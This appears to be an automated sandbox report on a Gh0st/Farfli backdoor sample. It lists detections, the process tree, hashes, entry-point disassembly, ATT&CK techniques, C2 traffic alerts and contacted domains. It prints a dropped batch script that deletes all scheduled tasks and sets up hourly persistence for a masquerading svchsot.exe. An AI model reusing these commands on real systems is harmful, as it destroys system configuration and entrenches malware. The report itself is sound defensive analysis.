Source: Yara match | File source: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: ILQ18dgzMU.exe PID: 7384, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchsot.exe PID: 8024, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 00000000.00000002.4082870617.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.3947674150.0000000000780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.3090838933.0000000002150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000020.00000002.1733553944.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: ILQ18dgzMU.exe PID: 7384, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchsot.exe PID: 8024, type: MEMORYSTR
MITRE ATT&CK Matrix (techniques listed per tactic; a leading number is the report's badge count for a detected technique)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: 1 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: 2 Native API; 2 Command and Scripting Interpreter; 1 Scheduled Task/Job; 13 Service Execution; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: 1 Scripting; 1 DLL Side-Loading; 12 Windows Service; 1 Scheduled Task/Job; 1 Registry Run Keys / Startup Folder; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: 1 DLL Side-Loading; 1 Access Token Manipulation; 12 Windows Service; 12 Process Injection; 1 Scheduled Task/Job; 1 Registry Run Keys / Startup Folder; Startup Items; Scheduled Task/Job; At; Cron
Defense Evasion: 1 Disable or Modify Tools; 1 Obfuscated Files or Information; 1 DLL Side-Loading; 12 Masquerading; 121 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 12 Process Injection; 1 Indicator Removal; HTML Smuggling; Dynamic API Resolution
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: 1 System Time Discovery; 1 Account Discovery; 1 System Service Discovery; 2 File and Directory Discovery; 15 System Information Discovery; 241 Security Software Discovery; 121 Virtualization/Sandbox Evasion; 12 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: 1 Archive Collected Data; 3 Clipboard Data; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: 21 Ingress Tool Transfer; 1 Encrypted Channel; 1 Non-Application Layer Protocol; 1 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
Behavior Graph ID: 1565415 | Sample: ILQ18dgzMU.exe | Start date: 29/11/2024 | Architecture: WINDOWS | Score: 100

Contacted domains / IPs: www.wk1888.com; www.fz0575.com; 2 other IPs or domains; expired.gname.net 172.65.190.172 (ports 49736, 49917, 50004), CLOUDFLARENETUS, United States
Top-level signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; 12 other signatures

Process tree:
ILQ18dgzMU.exe (started)
  dropped: C:\Windows\...\svchsot.exe (PE32); C:\Windows\...\svchsot.exe:Zone.Identifier (ASCII); C:\Windows\...\JH.BAT (DOS)
  signatures: Found stalling execution ending in API Sleep call; Contains functionality to detect virtual machines (IN, VMware); Checks if browser processes are running; Contains functionality to detect sleep reduction / modifications
  cmd.exe (started)
    signatures: Uses schtasks.exe or at.exe to add and modify task schedules
    net.exe (started)
      net1.exe (started)
    conhost.exe (started)
    schtasks.exe (started)
    26 other processes
svchsot.exe (started)

Source | Detection | Scanner | Label | Link
ILQ18dgzMU.exe | 95% | ReversingLabs | Win32.Backdoor.Farfli |
ILQ18dgzMU.exe | 100% | Avira | BDS/Agent.IR |
ILQ18dgzMU.exe | 100% | Joe Sandbox ML | |
Source | Detection | Scanner | Label | Link
C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe | 100% | Avira | BDS/Agent.IR |
C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe | 100% | Joe Sandbox ML | |
C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe | 95% | ReversingLabs | Win32.Backdoor.Farfli |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
expired.gname.net | 172.65.190.172 | true | false | | high
www.af0575.com | unknown | unknown | true | | unknown
www.wk1888.com | unknown | unknown | true | | unknown
www.fz0575.com | unknown | unknown | true | | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
172.65.190.172 | expired.gname.net | United States | | 13335 | CLOUDFLARENETUS | false
                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1565415
                  Start date and time:2024-11-29 19:11:05 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 7m 45s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:37
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:ILQ18dgzMU.exe
                  renamed because original name is a hash value
                  Original Sample Name:a153080f9a968b6488cf1cf2e2ea78a3.exe
                  Detection:MAL
                  Classification:mal100.bank.troj.evad.winEXE@64/4@6/1
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 99%
                  • Number of executed functions: 34
                  • Number of non-executed functions: 230
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • VT rate limit hit for: ILQ18dgzMU.exe
Time | Type | Description
13:11:52 | API Interceptor | 13042285x Sleep call for process: ILQ18dgzMU.exe modified
18:11:54 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run XXXXXX579E5A5B VVVVVVrr2unw== C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
172.65.190.172 | OVoo3T4wlS.exe | malicious | GhostRat, Nitol |
172.65.190.172 | https://daf2019.com/8/02 | malicious | Unknown |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
expired.gname.net | OVoo3T4wlS.exe | malicious | GhostRat, Nitol | 172.65.190.172
expired.gname.net | https://daf2019.com/8/02 | malicious | Unknown | 172.65.190.172
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | file.exe | malicious | LummaC Stealer | 104.21.16.9
CLOUDFLARENETUS | weWHT1b7JO.dll | malicious | Unknown | 104.26.13.205
CLOUDFLARENETUS | phish_alert_iocp_v1.4.48 (80).eml | malicious | InvoiceScam | 104.17.3.95
CLOUDFLARENETUS | https://shorturl.at/IFOx4?US=7226wlev | malicious | Unknown | 104.21.39.244
CLOUDFLARENETUS | https://mobile.mail.yahoo.com/apps/affiliateRouter?brandUrl=https://www.google.com/amp/t.co/N0QLoca1EY&appName=YMailNorrin&partner=1&locale=1&pageId=commerce_intent&clickRef=message_header&region=us&annotation=&buckets=&segment=&interactedItem=&slot=&uuid=mailNA | malicious | Unknown | 172.66.0.227
CLOUDFLARENETUS | file.exe | malicious | LummaC Stealer | 104.21.16.9
CLOUDFLARENETUS | file.exe | malicious | LummaC, Amadey, Clipboard Hijacker, LummaC Stealer | 172.67.160.80
CLOUDFLARENETUS | file.exe | malicious | Amadey, AsyncRAT, Cryptbot, DcRat, LummaC Stealer, Nymaim, Stealc | 104.21.16.9
CLOUDFLARENETUS | crypted_LummaC2.exe | malicious | LummaC Stealer | 104.21.58.9
CLOUDFLARENETUS | crypted_LummaC2 (3).exe | malicious | LummaC Stealer | 104.21.58.9
                      No context
                      No context
                      Process:C:\Users\user\Desktop\ILQ18dgzMU.exe
                      File Type:ASCII text, with no line terminators
                      Category:modified
                      Size (bytes):7
                      Entropy (8bit):2.8073549220576046
                      Encrypted:false
                      SSDEEP:3:qR:qR
                      MD5:7A1920D61156ABC05A60135AEFE8BC67
                      SHA1:808D7DCA8A74D84AF27A2D6602C3D786DE45FE1E
                      SHA-256:21B111CBFE6E8FCA2D181C43F53AD548B22E38ACA955B9824706A504B0A07A2D
                      SHA-512:94ABFC7B11F4311E8E279B580907FEFC1118690479FB7E13F0C22ADE816BC2B63346498833B0241EEC2B09E15172E13027DC85024BACB7BC40C150F4131F7292
                      Malicious:false
                      Preview:Default
                      Process:C:\Users\user\Desktop\ILQ18dgzMU.exe
                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1672
                      Entropy (8bit):4.963031619864791
                      Encrypted:false
                      SSDEEP:24:/7zzUCSYaqpzm0s8c3uBUVfaUvUSUYSUYUOsUmUhUdfaUtBWp/idg:jz4wX7idMnG54jCdfftG
                      MD5:D8D3A3C95E9E23157286B883310DB430
                      SHA1:DF3540006561B11EBA293CB19556CB21A5F1CAB7
                      SHA-256:A6557C4D137E61F94DF072AE9F05D890F418388745151263D3278F0020A49BA1
                      SHA-512:B5065A78947236960E6DC632443443570839C47BA6107E091EFD4C84DF7F21A93DFF07D97FC892D69A58CCECB5C04B019E8ADBC718F735B0D9821EE7B82D21BC
                      Malicious:true
                      Preview:@echo off..schtasks /delete /tn * /f..sc config Schedule start= auto ..net start "Task Scheduler"..At 0:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe..At 1:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe..At 2:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe..At 3:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe..At 4:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe..At 5:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe..At 6:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe..At 7:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe..At 8:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe..At 9:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe..At 10:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe..At 11:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe..At 12:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe..At 13:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe..At 14:00 C:\Windows\XXXXXX579
                      Process:C:\Users\user\Desktop\ILQ18dgzMU.exe
                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):187392
                      Entropy (8bit):7.748356878725097
                      Encrypted:false
                      SSDEEP:3072:bMqKbTtCSIT0chwzzcdZKF8UvvoeWofjjpAVioRF8s//NLj6h+EvtRU:o9MMmwzlqUHoeWofjjpAViY/lH6h+EvU
                      MD5:A153080F9A968B6488CF1CF2E2EA78A3
                      SHA1:6537F18FB326BCB4D7FC503C40B7BB21A136F560
                      SHA-256:E0989C99125DBC5957C7ECDFDC37FF6B7F31F2979531F3FB8747127243F28B7D
                      SHA-512:B45D7B90D4951E1E03E99763FA78C999BF372C200B0A42F1ECC7959F330A40DB6A563CE3E696E174E37621F120DE25097F712B4003853EE4929B38CA9D6DBEB3
                      Malicious:true
                      Antivirus:
                      • Antivirus: Avira, Detection: 100%
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      • Antivirus: ReversingLabs, Detection: 95%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1 ..uA..uA..uA...]..tA..Cg..tA...]..xA..Cg..iA...N..pA..uA..[A...^..tA...^..tA...G..tA..RichuA..........PE..L....j.N.................D..........!........`....@.........................................................................Td..<....................................................................................`...............................text....C.......D.................. ..`.rdata..|....`.......H..............@..@.data........p.......R..............@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\Desktop\ILQ18dgzMU.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):26
                      Entropy (8bit):3.95006375643621
                      Encrypted:false
                      SSDEEP:3:ggPYV:rPYV
                      MD5:187F488E27DB4AF347237FE461A079AD
                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                      Malicious:true
                      Preview:[ZoneTransfer]....ZoneId=0
                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.748356878725097
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:ILQ18dgzMU.exe
                      File size:187'392 bytes
                      MD5:a153080f9a968b6488cf1cf2e2ea78a3
                      SHA1:6537f18fb326bcb4d7fc503c40b7bb21a136f560
                      SHA256:e0989c99125dbc5957c7ecdfdc37ff6b7f31f2979531f3fb8747127243f28b7d
                      SHA512:b45d7b90d4951e1e03e99763fa78c999bf372c200b0a42f1ecc7959f330a40db6a563ce3e696e174e37621f120de25097f712b4003853ee4929b38ca9d6dbeb3
                      SSDEEP:3072:bMqKbTtCSIT0chwzzcdZKF8UvvoeWofjjpAVioRF8s//NLj6h+EvtRU:o9MMmwzlqUHoeWofjjpAViY/lH6h+EvU
                      TLSH:290412AF387008DBC40D4A70E9E657101C3B92232069E9CF956865DA1E399F4DE3F6DB
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1 ..uA..uA..uA...]..tA..Cg..tA...]..xA..Cg..iA...N..pA..uA..[A...^..tA...^..tA...G..tA..RichuA..........PE..L....j.N...........
                      Icon Hash:90cececece8e8eb0
                      Entrypoint:0x401d21
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      DLL Characteristics:
                      Time Stamp:0x4E846A08 [Thu Sep 29 12:52:24 2011 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:29637e11e194dc0202df96c219ccfc7d
                      Instruction
                      push ebp
                      mov ebp, esp
                      push FFFFFFFFh
                      push 004060C0h
                      push 00403CCCh
                      mov eax, dword ptr fs:[00000000h]
                      push eax
                      mov dword ptr fs:[00000000h], esp
                      sub esp, 58h
                      push ebx
                      push esi
                      push edi
                      mov dword ptr [ebp-18h], esp
                      call dword ptr [00406050h]
                      xor edx, edx
                      mov dl, ah
                      mov dword ptr [0042F0A0h], edx
                      mov ecx, eax
                      and ecx, 000000FFh
                      mov dword ptr [0042F09Ch], ecx
                      shl ecx, 08h
                      add ecx, edx
                      mov dword ptr [0042F098h], ecx
                      shr eax, 10h
                      mov dword ptr [0042F094h], eax
                      xor esi, esi
                      push esi
                      call 00007FE574851459h
                      pop ecx
                      test eax, eax
                      jne 00007FE57484FFDAh
                      push 0000001Ch
                      call 00007FE574850085h
                      pop ecx
                      mov dword ptr [ebp-04h], esi
                      call 00007FE574851C69h
                      call dword ptr [0040604Ch]
                      mov dword ptr [0042F59Ch], eax
                      call 00007FE574851B27h
                      mov dword ptr [0042F070h], eax
                      call 00007FE5748518D0h
                      call 00007FE574851812h
                      call 00007FE57485152Fh
                      mov dword ptr [ebp-30h], esi
                      lea eax, dword ptr [ebp-5Ch]
                      push eax
                      call dword ptr [00406048h]
                      call 00007FE5748517A3h
                      mov dword ptr [ebp-64h], eax
                      test byte ptr [ebp-30h], 00000001h
                      je 00007FE57484FFD8h
                      movzx eax, word ptr [ebp-2Ch]
                      jmp 00007FE57484FFD5h
                      push 0000000Ah
                      pop eax
                      push eax
                      push dword ptr [ebp-64h]
                      push esi
                      push esi
                      call dword ptr [00406044h]
                      Programming Language:
                      • [C++] VS98 (6.0) SP6 build 8804
                      • [ C ] VS98 (6.0) SP6 build 8804
                      • [ C ] VS98 (6.0) build 8168
                      • [C++] VS98 (6.0) build 8168
                      • [EXP] VC++ 6.0 SP5 build 8804
                      Name | Virtual Address | Virtual Size | Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6454 | 0x3c | .rdata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x30000 | 0x694 | .rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_IAT | 0x6000 | 0xbc | .rdata
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                      Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                      .text | 0x1000 | 0x43c7 | 0x4400 | f399b515d887d41363c2a8986fd2221a | False | 0.6422909007352942 | data | 6.668942253552876 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .rdata | 0x6000 | 0x87c | 0xa00 | f8ada720da3f3d8a84c341dd08a5664b | False | 0.41171875 | data | 4.772065786709751 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .data | 0x7000 | 0x285a0 | 0x28200 | 741ac0346f3a7d09f5275dd536bc1b18 | False | 0.9349445093457944 | data | 7.82627228791118 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rsrc | 0x30000 | 0x694 | 0x800 | 820eecc2319367ceca0ccd542acf781d | False | 0.267578125 | data | 4.279737082084519 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                      08114A2C2012630105341 | 0x303cc | 0x46 | ASCII text, with CRLF line terminators | | | 0.5714285714285714
                      22BAF6692012630105341 | 0x30414 | 0x46 | ASCII text, with CRLF line terminators | | | 0.5714285714285714
                      422683822012630105341 | 0x3045c | 0x46 | JSON data | | | 0.5714285714285714
                      6C8C337A2012630105341 | 0x304a4 | 0x46 | ASCII text, with CRLF line terminators | | | 0.5714285714285714
                      9AF1A2EC2012630105341 | 0x304ec | 0x46 | ASCII text, with CRLF line terminators | | | 0.5714285714285714
                      HOST | 0x30534 | 0x104 | data | | | 0.5346153846153846
                      RT_VERSION | 0x30638 | 0x5c | data | Chinese | China | 0.6847826086956522
                      DLL | Import
                      KERNEL32.dll | HeapAlloc, GetProcessHeap, VirtualAlloc, VirtualProtect, VirtualFree, GetProcAddress, LoadLibraryA, IsBadReadPtr, HeapFree, FreeLibrary, ExitProcess, GetFileAttributesA, GetWindowsDirectoryA, GetVersionExA, GetStringTypeA, LCMapStringW, HeapReAlloc, GetModuleHandleA, GetStartupInfoA, GetCommandLineA, GetVersion, GetModuleFileNameA, GetEnvironmentVariableA, HeapDestroy, HeapCreate, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStrings, GetEnvironmentStringsW, SetHandleCount, GetStdHandle, GetFileType, RtlUnwind, WriteFile, GetCPInfo, GetACP, GetOEMCP, MultiByteToWideChar, LCMapStringA, GetStringTypeW
                      USER32.dll | wsprintfA
                      Language of compilation system | Country where language is spoken | Map
                      Chinese | China |
                      Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                      2024-11-29T19:12:53.559954+0100 | 2013214 | ET MALWARE Gh0st Remote Access Trojan Encrypted Session To CnC Server | 1 | 192.168.2.4 | 49736 | 172.65.190.172 | 8000 | TCP
                      2024-11-29T19:12:53.559954+0100 | 2016922 | ET MALWARE Backdoor family PCRat/Gh0st CnC traffic | 1 | 192.168.2.4 | 49736 | 172.65.190.172 | 8000 | TCP
                      2024-11-29T19:14:19.251251+0100 | 2013214 | ET MALWARE Gh0st Remote Access Trojan Encrypted Session To CnC Server | 1 | 192.168.2.4 | 49917 | 172.65.190.172 | 8000 | TCP
                      2024-11-29T19:14:19.251251+0100 | 2016922 | ET MALWARE Backdoor family PCRat/Gh0st CnC traffic | 1 | 192.168.2.4 | 49917 | 172.65.190.172 | 8000 | TCP
                      2024-11-29T19:15:44.988375+0100 | 2013214 | ET MALWARE Gh0st Remote Access Trojan Encrypted Session To CnC Server | 1 | 192.168.2.4 | 50004 | 172.65.190.172 | 8000 | TCP
                      2024-11-29T19:15:44.988375+0100 | 2016922 | ET MALWARE Backdoor family PCRat/Gh0st CnC traffic | 1 | 192.168.2.4 | 50004 | 172.65.190.172 | 8000 | TCP
                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                      Nov 29, 2024 19:12:53.400191069 CET | 49736 | 8000 | 192.168.2.4 | 172.65.190.172
                      Nov 29, 2024 19:12:53.520184040 CET | 8000 | 49736 | 172.65.190.172 | 192.168.2.4
                      Nov 29, 2024 19:12:53.520293951 CET | 49736 | 8000 | 192.168.2.4 | 172.65.190.172
                      Nov 29, 2024 19:12:53.559953928 CET | 49736 | 8000 | 192.168.2.4 | 172.65.190.172
                      Nov 29, 2024 19:12:53.680284023 CET | 8000 | 49736 | 172.65.190.172 | 192.168.2.4
                      Nov 29, 2024 19:12:54.451337099 CET | 8000 | 49736 | 172.65.190.172 | 192.168.2.4
                      Nov 29, 2024 19:12:54.451412916 CET | 49736 | 8000 | 192.168.2.4 | 172.65.190.172
                      Nov 29, 2024 19:12:54.451486111 CET | 49736 | 8000 | 192.168.2.4 | 172.65.190.172
                      Nov 29, 2024 19:14:19.015290976 CET | 49917 | 8000 | 192.168.2.4 | 172.65.190.172
                      Nov 29, 2024 19:14:19.135548115 CET | 8000 | 49917 | 172.65.190.172 | 192.168.2.4
                      Nov 29, 2024 19:14:19.141808987 CET | 49917 | 8000 | 192.168.2.4 | 172.65.190.172
                      Nov 29, 2024 19:14:19.251250982 CET | 49917 | 8000 | 192.168.2.4 | 172.65.190.172
                      Nov 29, 2024 19:14:19.371258974 CET | 8000 | 49917 | 172.65.190.172 | 192.168.2.4
                      Nov 29, 2024 19:14:20.073160887 CET | 8000 | 49917 | 172.65.190.172 | 192.168.2.4
                      Nov 29, 2024 19:14:20.073224068 CET | 49917 | 8000 | 192.168.2.4 | 172.65.190.172
                      Nov 29, 2024 19:14:20.073352098 CET | 49917 | 8000 | 192.168.2.4 | 172.65.190.172
                      Nov 29, 2024 19:15:44.650701046 CET | 50004 | 8000 | 192.168.2.4 | 172.65.190.172
                      Nov 29, 2024 19:15:44.771245003 CET | 8000 | 50004 | 172.65.190.172 | 192.168.2.4
                      Nov 29, 2024 19:15:44.774311066 CET | 50004 | 8000 | 192.168.2.4 | 172.65.190.172
                      Nov 29, 2024 19:15:44.988374949 CET | 50004 | 8000 | 192.168.2.4 | 172.65.190.172
                      Nov 29, 2024 19:15:45.108714104 CET | 8000 | 50004 | 172.65.190.172 | 192.168.2.4
                      Nov 29, 2024 19:15:45.707020044 CET | 8000 | 50004 | 172.65.190.172 | 192.168.2.4
                      Nov 29, 2024 19:15:45.708409071 CET | 50004 | 8000 | 192.168.2.4 | 172.65.190.172
                      Nov 29, 2024 19:15:45.708491087 CET | 50004 | 8000 | 192.168.2.4 | 172.65.190.172
                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                      Nov 29, 2024 19:11:53.825917006 CET | 51185 | 53 | 192.168.2.4 | 1.1.1.1
                      Nov 29, 2024 19:11:54.811140060 CET | 51185 | 53 | 192.168.2.4 | 1.1.1.1
                      Nov 29, 2024 19:11:55.811650038 CET | 51185 | 53 | 192.168.2.4 | 1.1.1.1
                      Nov 29, 2024 19:11:56.670790911 CET | 53 | 51185 | 1.1.1.1 | 192.168.2.4
                      Nov 29, 2024 19:11:56.670805931 CET | 53 | 51185 | 1.1.1.1 | 192.168.2.4
                      Nov 29, 2024 19:11:56.670815945 CET | 53 | 51185 | 1.1.1.1 | 192.168.2.4
                      Nov 29, 2024 19:11:56.673536062 CET | 59590 | 53 | 192.168.2.4 | 1.1.1.1
                      Nov 29, 2024 19:11:56.850616932 CET | 53 | 59590 | 1.1.1.1 | 192.168.2.4
                      Nov 29, 2024 19:11:56.851383924 CET | 62553 | 53 | 192.168.2.4 | 1.1.1.1
                      Nov 29, 2024 19:11:57.135943890 CET | 53 | 62553 | 1.1.1.1 | 192.168.2.4
                      Nov 29, 2024 19:12:52.921065092 CET | 53420 | 53 | 192.168.2.4 | 1.1.1.1
                      Nov 29, 2024 19:12:53.397728920 CET | 53 | 53420 | 1.1.1.1 | 192.168.2.4
                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                      Nov 29, 2024 19:11:53.825917006 CET | 192.168.2.4 | 1.1.1.1 | 0x8f9b | Standard query (0) | www.wk1888.com | A (IP address) | IN (0x0001) | false
                      Nov 29, 2024 19:11:54.811140060 CET | 192.168.2.4 | 1.1.1.1 | 0x8f9b | Standard query (0) | www.wk1888.com | A (IP address) | IN (0x0001) | false
                      Nov 29, 2024 19:11:55.811650038 CET | 192.168.2.4 | 1.1.1.1 | 0x8f9b | Standard query (0) | www.wk1888.com | A (IP address) | IN (0x0001) | false
                      Nov 29, 2024 19:11:56.673536062 CET | 192.168.2.4 | 1.1.1.1 | 0x8be | Standard query (0) | www.af0575.com | A (IP address) | IN (0x0001) | false
                      Nov 29, 2024 19:11:56.851383924 CET | 192.168.2.4 | 1.1.1.1 | 0x1c5a | Standard query (0) | www.fz0575.com | A (IP address) | IN (0x0001) | false
                      Nov 29, 2024 19:12:52.921065092 CET | 192.168.2.4 | 1.1.1.1 | 0x1c98 | Standard query (0) | www.wk1888.com | A (IP address) | IN (0x0001) | false
                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
